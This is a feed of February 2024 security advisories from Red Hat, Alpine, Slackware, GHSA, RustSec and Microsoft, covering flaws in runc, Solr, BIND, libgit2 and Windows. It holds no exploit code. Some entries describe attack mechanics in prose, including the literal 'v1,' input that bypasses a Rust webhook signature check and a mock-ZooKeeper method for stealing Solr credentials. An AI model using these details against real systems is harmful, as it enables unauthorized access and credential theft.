08.02.2024 02:00:00	redhat	[RHSA-2024:0748] container-tools:4.0 security update (important)	The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* runc: file descriptor leak ("Leaky Vessels") (CVE-2024-21626)A Red Hat Security Bulletin which addresses further details about the Leaky Vessels flaw is available in the References section.* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0748
08.02.2024 17:40:20	android	[ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)	In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947
10.02.2024 01:15:08	alpinelinux	[ALPINE:CVE-2023-6935] wolfssl vulnerability	[From CVE-2023-6935] wolfSSL SP Math All RSA implementation is vulnerable to the Marvin Attack, new variation of a timing Bleichenbacher style attack, when built with the following options to configure:--enable-all CFLAGS="-DWOLFSSL_STATIC_RSA"The define “WOLFSSL_STATIC_RSA” enables static RSA cipher suites, which is not recommended, and has been disabled by default since wolfSSL 3.6.6. Therefore the default build since 3.6.6, even with "--enable-all", is not vulnerable to the Marvin Attack. The vulnerability is specific to static RSA cipher suites, and expected to be padding-independent.The vulnerability allows an attacker to decrypt ciphertexts and forge signatures after probing with a large number of test observations. However the server’s private key is not exposed.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6935
09.02.2024 23:51:14	slackware	[SSA:2024-040-01] xpdf	New xpdf packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/xpdf-4.05-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Fixed a bug in the ICCBased color space parser that was allowing the number of components to be zero. Thanks to huckleberry for the bug report. Fixed a bug in the ICCBased color space parser that was allowing the number of components to be zero. Thanks to huckleberry for the bug report. Added checks for PDF object loops in AcroForm::scanField(), Catalog::readPageLabelTree2(), and Catalog::readEmbeddedFileTree(). The zero-width character problem can also happen if the page size is very large -- that needs to be limited too, the same way as character position coordinates. Thanks to jlinliu for the bug report. Add some missing bounds check code in DCTStream. Thanks to Jiahao Liu for the bug report. Fix a deadlock when an object stream's length field is contained in another object stream. Thanks to Jiahao Liu for the bug report. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-2662 https://www.cve.org/CVERecord?id=CVE-2023-2662 https://www.cve.org/CVERecord?id=CVE-2018-7453 https://www.cve.org/CVERecord?id=CVE-2018-16369 https://www.cve.org/CVERecord?id=CVE-2022-36561 https://www.cve.org/CVERecord?id=CVE-2022-41844 https://www.cve.org/CVERecord?id=CVE-2023-2663 https://www.cve.org/CVERecord?id=CVE-2023-2664 https://www.cve.org/CVERecord?id=CVE-2023-3044 https://www.cve.org/CVERecord?id=CVE-2023-3436 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xpdf-4.05-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xpdf-4.05-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xpdf-4.05-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/xpdf-4.05-x86_64-1.txzMD5 signaturesSlackware 15.0 package:f7667c53e498407c734c0aa48041b27c xpdf-4.05-i586-1_slack15.0.txzSlackware x86_64 15.0 package:18ea58703d2516ecac8a126092297d99 xpdf-4.05-x86_64-1_slack15.0.txzSlackware -current package:20ccc8259c8b7d0c48c857e749766d5f xap/xpdf-4.05-i586-1.txzSlackware x86_64 -current package:335e2ea6a54d540a95754c619b6a5e3b xap/xpdf-4.05-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg xpdf-4.05-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-040-01
09.02.2024 23:53:15	maven	[MAVEN:GHSA-37VR-VMG4-JWPW] Apache Solr: Backup/Restore APIs allow for deployment of executables in malicious ConfigSets (moderate)	Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API.When backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups).If the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted.When Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries.Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.In these versions, the following protections have been added: * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader. * The Backup API restricts saving backups to directories that are used in the ClassLoader.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-37VR-VMG4-JWPW
09.02.2024 23:43:20	maven	[MAVEN:GHSA-3HWC-RQWP-V36Q] Apache Solr can leak certain passwords due to System Property redaction logic inconsistencies (moderate)	Insufficiently Protected Credentials vulnerability in Apache Solr.This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.3.0.One of the two endpoints that publishes the Solr process' Java system properties, /admin/info/properties, was only setup to hide system properties that had "password" contained in the name.There are a number of sensitive system properties, such as "basicauth" and "aws.secretKey" do not contain "password", thus their values were published via the "/admin/info/properties" endpoint.This endpoint populates the list of System Properties on the home screen of the Solr Admin page, making the exposed credentials visible in the UI.This /admin/info/properties endpoint is protected under the "config-read" permission.Therefore, Solr Clouds with Authorization enabled will only be vulnerable through logged-in users that have the "config-read" permission.Users are recommended to upgrade to version 9.3.0 or 8.11.3, both of which fix the issue.A single option now controls hiding Java system property for all endpoints, "-Dsolr.hiddenSysProps".By default all known sensitive properties are hidden (including "-Dbasicauth"), as well as any property with a name containing "secret" or "password".Users who cannot upgrade can also use the following Java system property to fix the issue: `-Dsolr.redaction.system.pattern=.(password\|secret\|basicauth).`	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3HWC-RQWP-V36Q
10.02.2024 00:16:48	maven	[MAVEN:GHSA-4WXW-42WX-2WFX] Apache Solr Schema Designer blindly "trusts" all configsets (low)	Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr.This issue affects Apache Solr from 8.10.0 through 8.11.2, from 9.0.0 before 9.3.0.The Schema Designer was introduced to allow users to more easily configure and test new Schemas and configSets.However, when the feature was created, the "trust" (authentication) of these configSets was not considered.External library loading is only available to configSets that are "trusted" (created by authenticated users), thus non-authenticated users are unable to perform Remote Code Execution.Since the Schema Designer loaded configSets without taking their "trust" into account, configSets that were created by unauthenticated users were allowed to load external libraries when used in the Schema Designer.Users are recommended to upgrade to version 9.3.0 or 8.11.3, both of which fix the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4WXW-42WX-2WFX
10.02.2024 00:17:03	maven	[MAVEN:GHSA-XRJ7-X7GP-WWQR] Apache Solr's Streaming Expressions allow users to extract data from other Solr Clouds (low)	Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. This issue affects Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter.When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides.An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, then send a streaming expression using the mock server's address in "zkHost".Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions.Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.From these versions on, only zkHost values that have the same server address (regardless of chroot), will use the given ZooKeeper credentials and ACLs when connecting.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XRJ7-X7GP-WWQR
09.02.2024 17:20:28	npm	[NPM:GHSA-22R3-9W55-CJ54] Pkg Local Privilege Escalation (moderate)	### ImpactAny native code packages built by `pkg` are written to a hardcoded directory. On unix systems, this is `/tmp/pkg/*` which is a shared directory for all users on the same local system. There is no uniqueness to the package names within this directory, they are predictable.An attacker who has access to the same local system has the ability to replace the genuine executables in the shared directory with malicious executables of the same name. A user may then run the malicious executable without realising it has been modified.### PatchesThis package is deprecated. Therefore, there will not be a patch provided for this vulnerability.### Recommended Action:To check if your executable build by pkg depends on native code and is vulnerable, run the executable and check if `/tmp/pkg/` was created.Users should transition to actively maintained alternatives. We would recommend investigating Node.js 21’s support for [single executable applications](https://nodejs.org/api/single-executable-applications.html).### WorkaroundsGiven the decision to deprecate the pkg package, there are no official workarounds or remediations provided by our team. Users should prioritize migrating to other packages that offer similar functionality with enhanced security.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-22R3-9W55-CJ54
09.02.2024 17:19:16	maven	[MAVEN:GHSA-583G-G682-CRXF] Micronaut management endpoints vulnerable to drive-by localhost attack (moderate)	### SummaryEnabled but unsecured management endpoints are susceptible to drive-by localhost attacks. While not typical of a production application, these attacks may have more impact on a development environment where such endpoints may be flipped on without much thought.### DetailsA malicious/compromised website can make HTTP requests to `localhost`. Normally, such requests would trigger a CORS preflight check which would prevent the request; however, some requests are ["simple"](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) and do not require a preflight check. These endpoints, if enabled and not secured, are vulnerable to being triggered.### ImpactProduction environments typically disable unused endpoints and secure/restrict access to needed endpoints. A more likely victim is the developer in their local development host, who has enabled endpoints without security for the sake of easing development.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-583G-G682-CRXF
09.02.2024 09:16:00	alpinelinux	[ALPINE:CVE-2024-0229] xorg-server, xwayland vulnerability	[From CVE-2024-0229] An out-of-bounds memory access flaw was found in the X.Org server. This issue can be triggered when a device frozen by a sync grab is reattached to a different master device. This issue may lead to an application crash, local privilege escalation (if the server runs with extended privileges), or remote code execution in SSH X11 forwarding environments.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0229
09.02.2024 02:15:08	alpinelinux	[ALPINE:CVE-2024-24821] composer vulnerability	[From CVE-2024-24821] Composer is a dependency Manager for the PHP language. In affected versions several files within the local working directory are included during the invocation of Composer and in the context of the executing user. As such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files. All Composer CLI commands are affected, including composer.phar's self-update. The following scenarios are of high risk: Composer being run with sudo, Pipelines which may execute Composer on untrusted projects, Shared environments with developers who run Composer individually on the same project. This vulnerability has been addressed in versions 2.7.0 and 2.2.23. It is advised that the patched versions are applied at the earliest convenience. Where not possible, the following should be addressed: Remove all sudo composer privileges for all users to mitigate root privilege escalation, and avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. A reset can also be done on these files by the following:```shrm vendor/composer/installed.php vendor/composer/InstalledVersions.phpcomposer install --no-scripts --no-plugins```	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24821
09.02.2024 02:00:00	cisa	[CISA-2024:0209] CISA Adds One Known Exploited Vulnerability to Catalog	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0209
09.02.2024 02:00:00	debian	[DSA-5619-1] libgit2	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5619-1
09.02.2024 02:00:00	redhat	[RHSA-2024:0753] linux-firmware security update (moderate)	The linux-firmware packages contain all of the firmware files that are required by various devices to operate.Security Fix(es):* (RCVE-2023-20592)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0753
09.02.2024 02:00:00	gentoo	[GLSA-202402-11] libxml2: Multiple Vulnerabilities (normal)	Multiple denial of service vulnerabilities have been found in libxml2.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-11
09.02.2024 02:00:00	oraclelinux	[ELSA-2024-12149] kernel security update (important)	[5.14.0-362.18.0.2]- net/sched: sch_hfsc: Ensure inner classes have fsc curve {CVE-2023-4623}- net/sched: sch_hfsc: upgrade 'rt' to 'sc' when it becomes a inner curve {CVE-2023-4623}- dpll: core: Add DPLL framework base functions {CVE-2023-6679}- dpll: spec: Add Netlink spec in YAML {CVE-2023-6679}- dpll: netlink: Add DPLL framework base functions {CVE-2023-6679}- netdev: expose DPLL pin handle for netdevice {CVE-2023-6679}- netdev: Remove unneeded semicolon {CVE-2023-6679}- dpll: netlink/core: add support for pin-dpll signal phase offset/adjust {CVE-2023-6679}- dpll: netlink/core: change pin frequency set behavior {CVE-2023-6679}- dpll: Fix potential msg memleak when genlmsg_put_reply failed {CVE-2023-6679}- dpll: sanitize possible null pointer dereference in dpll_pin_parent_pin_set() {CVE-2023-6679}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12149
09.02.2024 17:12:07	npm	[NPM:GHSA-78XJ-CGH5-2H22] NPM IP package vulnerable to Server-Side Request Forgery (SSRF) attacks (high)	An issue in NPM IP Package v.1.1.8 and before allows an attacker to execute arbitrary code and obtain sensitive information via the `isPublic()` function. This can lead to potential Server-Side Request Forgery (SSRF) attacks. The core issue is the function's failure to accurately distinguish between public and private IP addresses.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-78XJ-CGH5-2H22
09.02.2024 17:40:03	android	[ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)	In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947
10.02.2024 17:57:43	rustsec	[RUSTSEC-2024-0010] Improper comparison of different-length signatures	The `Webhook::verify` function incorrectly compared signatures ofdifferent lengths - the two signatures would only be compared up tothe length of the shorter signature. This allowed an attacker topass in `v1,` as the signature, which would always pass verification.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0010
10.02.2024 04:46:05	rustsec	[RUSTSEC-2024-0013] Memory corruption, denial of service, and arbitrary code execution in libgit2	The [libgit2](https://github.com/libgit2/libgit2/) project fixed three security issues in the 1.7.2 release. These issues are:* The `git_revparse_single` function can potentially enter an infinite loop on a well-crafted input, potentially causing a Denial of Service. This function is exposed in the `git2` crate via the [`Repository::revparse_single`](https://docs.rs/git2/latest/git2/struct.Repository.html#method.revparse_single) method.* The `git_index_add` function may cause heap corruption and possibly lead to arbitrary code execution. This function is exposed in the `git2` crate via the [`Index::add`](https://docs.rs/git2/latest/git2/struct.Index.html#method.add) method.* The smart transport negotiation may experience an out-of-bounds read when a remote server did not advertise capabilities.The `libgit2-sys` crate bundles libgit2, or optionally links to a system libgit2 library. In either case, versions of the libgit2 library less than 1.7.2 are vulnerable. The 0.16.2 release of `libgit2-sys` bundles the fixed version of 1.7.2, and requires a system libgit2 version of at least 1.7.2.It is recommended that all users upgrade.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0013
14.02.2024 06:22:19	slackware	[SSA:2024-044-02] dnsmasq	New dnsmasq packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/dnsmasq-2.90-i586-1_slack15.0.txz: Upgraded. Add limits on the resources used to do DNSSEC validation. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-50387 https://www.cve.org/CVERecord?id=CVE-2023-50868 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/dnsmasq-2.90-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/dnsmasq-2.90-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dnsmasq-2.90-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/dnsmasq-2.90-x86_64-1.txzMD5 signaturesSlackware 15.0 package:5c3dee26922dd2a3f58d1e5c70f9f284 dnsmasq-2.90-i586-1_slack15.0.txzSlackware x86_64 15.0 package:35f4d14b31baf2de9e3910f0f052f25d dnsmasq-2.90-x86_64-1_slack15.0.txzSlackware -current package:1210b07b47998ab00dcf6cc7e3c9dd30 n/dnsmasq-2.90-i586-1.txzSlackware x86_64 -current package:9862a73b6a5462656da236cd0ec4f9c2 n/dnsmasq-2.90-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg dnsmasq-2.90-i586-1_slack15.0.txz`Then restart dnsmasq if you are using it:`# sh /etc/rc.d/rc.dnsmasq restart`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-044-02
13.02.2024 21:35:21	slackware	[SSA:2024-044-01] bind	New bind packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/bind-9.16.48-i586-1_slack15.0.txz: Upgraded. This update fixes bugs and security issues: Specific DNS answers could cause a denial-of-service condition due to DNS validation taking a long time. Query patterns that continuously triggered cache database maintenance could exhaust all available memory on the host running named. Restore DNS64 state when handling a serve-stale timeout. Specific queries could trigger an assertion check with nxdomain-redirect enabled. Speed up parsing of DNS messages with many different names. For more information, see: https://kb.isc.org/docs/cve-2023-50387 https://www.cve.org/CVERecord?id=CVE-2023-50387 https://kb.isc.org/docs/cve-2023-6516 https://www.cve.org/CVERecord?id=CVE-2023-6516 https://kb.isc.org/docs/cve-2023-5679 https://www.cve.org/CVERecord?id=CVE-2023-5679 https://kb.isc.org/docs/cve-2023-5517 https://www.cve.org/CVERecord?id=CVE-2023-5517 https://kb.isc.org/docs/cve-2023-4408 https://www.cve.org/CVERecord?id=CVE-2023-4408 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/bind-9.16.48-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/bind-9.16.48-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.18.24-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.18.24-x86_64-1.txzMD5 signaturesSlackware 15.0 package:688d05942acae07ca040a07057f107af bind-9.16.48-i586-1_slack15.0.txzSlackware x86_64 15.0 package:72ec1aa452c6b37046e74b90797be3e8 bind-9.16.48-x86_64-1_slack15.0.txzSlackware -current package:8e3c11dba6a01af76aa89531c2e2d62a n/bind-9.18.24-i586-1.txzSlackware x86_64 -current package:8a9d10f4a4f1501ffc7f087dec4e281e n/bind-9.18.24-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg bind-9.16.48-i586-1_slack15.0.txz`Then, restart the name server:`# /etc/rc.d/rc.bind restart`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-044-01
13.02.2024 16:15:46	alpinelinux	[ALPINE:CVE-2023-6516] bind vulnerability	[From CVE-2023-6516] To keep its cache database efficient, `named` running as a recursive resolver occasionally attempts to clean up the database. It uses several methods, including some that are asynchronous: a small chunk of memory pointing to the cache element that can be cleaned up is first allocated and then queued for later processing. It was discovered that if the resolver is continuously processing query patterns triggering this type of cache-database maintenance, `named` may not be able to handle the cleanup events in a timely manner. This in turn enables the list of queued cleanup events to grow infinitely large over time, allowing the configured `max-cache-size` limit to be significantly exceeded.This issue affects BIND 9 versions 9.16.0 through 9.16.45 and 9.16.8-S1 through 9.16.45-S1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6516
13.02.2024 16:15:45	alpinelinux	[ALPINE:CVE-2023-4408] bind vulnerability	[From CVE-2023-4408] The DNS message parsing code in `named` includes a section whose computational complexity is overly high. It does not cause problems for typical DNS traffic, but crafted queries and responses may cause excessive CPU load on the affected `named` instance by exploiting this flaw. This issue affects both authoritative servers and recursive resolvers.This issue affects BIND 9 versions 9.0.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-4408
13.02.2024 16:15:45	alpinelinux	[ALPINE:CVE-2023-5517] bind vulnerability	[From CVE-2023-5517] A flaw in query-handling code can cause `named` to exit prematurely with an assertion failure when: - `nxdomain-redirect <domain>;` is configured, and - the resolver receives a PTR query for an RFC 1918 address that would normally result in an authoritative NXDOMAIN response.This issue affects BIND 9 versions 9.12.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5517
13.02.2024 16:15:45	alpinelinux	[ALPINE:CVE-2023-5679] bind vulnerability	[From CVE-2023-5679] A bad interaction between DNS64 and serve-stale may cause `named` to crash with an assertion failure during recursive resolution, when both of these features are enabled.This issue affects BIND 9 versions 9.16.12 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.16.12-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5679
13.02.2024 16:15:45	alpinelinux	[ALPINE:CVE-2023-5680] bind vulnerability	[From CVE-2023-5680] If a resolver cache has a very large number of ECS records stored for the same name, the process of cleaning the cache database node for this name can significantly impair query performance. This issue affects BIND 9 versions 9.11.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-5680
13.02.2024 10:00:00	msrc	[MS:CVE-2024-20667] Azure DevOps Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20667
13.02.2024 10:00:00	msrc	[MS:CVE-2023-50387] MITRE: CVE-2023-50387 DNSSEC verification complexity can be exploited to exhaust CPU resources and stall DNS resolvers (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2023-50387
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21327] Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21327
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21329] Azure Connected Machine Agent Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21329
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21338] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21338
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21340] Windows Kernel Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21340
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21349] Microsoft ActiveX Data Objects Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21349
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21350] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21350
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21351] Windows SmartScreen Security Feature Bypass Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21351
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21352] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21352
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21354] Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21354
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21357] Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21357
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21358] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21358
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21360] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21360
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21361] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21361
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21366] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21366
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21369] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21369
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21371] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21371
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21372] Windows OLE Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21372
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21375] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21375
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21379] Microsoft Word Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21379
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21381] Microsoft Azure Active Directory B2C Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21381
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21386] .NET Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21386
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21389] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21389
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21393] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21393
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21394] Dynamics 365 Field Service Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21394
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21396] Dynamics 365 Sales Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21396
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21401] Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21401
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21402] Microsoft Outlook Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21402
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21404] .NET Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21404
